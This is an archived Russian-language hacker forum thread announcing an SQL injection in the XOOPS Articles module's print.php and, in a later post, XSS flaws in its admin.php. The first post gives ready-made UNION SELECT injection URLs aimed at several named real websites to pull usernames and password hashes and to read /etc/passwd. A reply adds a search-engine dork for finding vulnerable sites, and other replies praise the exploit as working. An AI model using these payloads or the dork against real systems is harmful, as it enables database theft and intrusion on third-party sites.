PDA

Просмотр полной версии : [xoops]


ice1k
02.03.2007, 21:02
Сейчас вот нарыл в Xoops'e одну вещь... Нигде в багтраках не видел этой уязвимости...

Программа: Xoops(пока что х3 до какой версии + должен присутствовать модуль - Articles)

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "id" в сценарии print.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Пример:
http://victim/modules/articles/print.php?id=-1{code}

URL производителя: www.xoops.org

Вот реальные примеры:


http://www.irc.by/modules/articles/print.php?id=-99+union+select+1,2,3,4,AES_DECRYPT(AES_ENCRYPT(un ame,0x71),0x71),AES_DECRYPT(AES_ENCRYPT(pass,0x71) ,0x71),7,8,9,10,11,12,13,14,15,16,17,18,19,20+from +xoops_users/*


http://www.xoops2.ru/modules/articles/print.php?id=-99+union+select+1,2,3,4,convert(user()+using+cp125 1),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+x oops2_users/*


http://www.xoops.pl/modules/articles/print.php?id=-99+union+select+1,2,3,4,user(),6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20+manga_users/*


http://www.dolbin.ru/modules/articles/print.php?id=-99+union+select+1,2,3,4,concat(uname,0x3a,pass),6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+xoops_ users/*


http://www.titanic.com/modules/articles/print.php?id=-99+union+select+1,2,3,4,LOAD_FILE('/etc/passwd'),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+ from+mysql.user/*

(c)ice1k :: AltST

Spyder
02.03.2007, 21:04
зачёт +
молодец

ice1k
03.03.2007, 00:29
Кстати... Если где-то вдруг это было - отпишитесь плз...

CBuH
03.03.2007, 01:50
неплохо, зачёт адназначна :)

chezz
03.03.2007, 03:16
Респект, работает! Ставлю +.

ice1k
03.03.2007, 14:01
Программа: XOOPS 2.0.16, возможно более ранние версии.

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение.
Уязвимость существует из-за недостаточной обработки входных данных в
параметре "tplset" и "module"(при определенных условиях, приведенных в
примерах) в сценарии /modules/system/admin.php. Удаленный пользователь может
с помощью специально сформированного запроса выполнить произвольный код
сценария в браузере жертвы в контексте безопасности уязвимого сайта. Для
успешной эксплуатации уязвимости целевой пользователь должен быть залогинен
как администратор.

Examples:
victim.xxx/modules/system/admin.php?fct=tplsets&op=listtpl&tplset=[XSS-here]&moddir=system
victim.xxx/modules/system/admin.php?fct=modulesadmin&op=install&module=[XSS-here]
URL производителя: http://xoops.org

(с)ice1k :: AltST

DIAgen
03.03.2007, 14:25
Вот держите сканер этой баги

http://www.google.com/
inurl:"/modules/articles/" Документация

p-range
03.03.2007, 14:26
респект ;)

ice1k
03.03.2007, 15:17
Вот держите сканер этой баги
а это ты зря... не нужно "развивать" скрипт-киддисов... :rolleyes: